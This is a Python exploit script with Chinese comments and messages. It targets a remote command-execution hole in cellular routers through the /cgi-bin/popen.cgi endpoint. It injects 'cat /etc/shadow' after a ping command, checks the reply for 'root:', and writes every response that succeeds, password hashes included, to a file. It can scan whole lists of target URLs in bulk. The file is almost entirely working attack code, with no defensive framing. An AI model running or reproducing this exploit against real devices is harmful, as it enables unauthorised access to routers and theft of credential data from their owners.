Cellular_rce_exp.py

# 作者: VulnExpo
# 日期: 2023-9-22

import requests
import argparse
requests.packages.urllib3.disable_warnings(requests.packages.urllib3.exceptions.InsecureRequestWarning)

def check_for_vulnerability(url, proxies={}, success_file=None):
    headers = {
        'User-Agent':'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36 Edg/110.0.1587.69',
        'Accept':'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8',
        'Accept-Language':'zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2',
        'Accept-Encoding':'gzip, deflate',
        'Upgrade-Insecure-Requests':'1',
        'Sec-Fetch-Dest':'document',
        'Sec-Fetch-Mode':'navigate',
        'Sec-Fetch-Site':'none',
        'Sec-Fetch-User':'?1',
        'Te':'trailers',
        'Connection':'close'
    }
    try:
        response = requests.get(url + '/cgi-bin/popen.cgi?command=ping%20-c%204%201.1.1.1;cat%20/etc/shadow&v=0.1303033443137912', headers=headers, proxies=proxies, verify=False, timeout=30)
        if response.status_code == 200 and "root:" in response.text:
            with open(success_file, 'a') as s_file:
                s_file.write(f"++++++++++++++++++\n")
                s_file.write(f"目标URL: {url}\n")
                s_file.write(f"Payload: ping -c 4 1.1.1.1;cat /etc/shadow&v=0.1303033443137912\n")
                s_file.write(f"响应内容:\n{response.text}\n\n")
            return True
    except Exception as e:
        print(f"发生异常：{e}")
    return False

def scan_targets(targets, proxies={}, success_file=None):
    for target in targets:
        target = target.strip()
        check_for_vulnerability(target, proxies, success_file)

if __name__ == '__main__':
    parser = argparse.ArgumentParser(description="移动路由器 Cellular Router 命令执行漏洞")
    parser.add_argument("-u", "--url", help="目标URL")
    parser.add_argument("-f", "--file", default="url.txt", help="目标URL列表，默认为url.txt")
    args = parser.parse_args()

    if not args.url and not args.file:
        print("请使用 -u 指定要扫描的目标URL或使用默认文件 url.txt。")
        exit(1)

    if args.url:
        urls = [args.url]
    elif args.file:
        with open(args.file, 'r') as file:
            urls = file.readlines()

    proxies = {

        }
    success_file = 'success_targets.txt'

    for url in urls:
        url = url.strip()
        scan_targets([url], proxies, success_file)

    print("扫描完成，成功的目标已保存到 success_targets.txt 文件中。")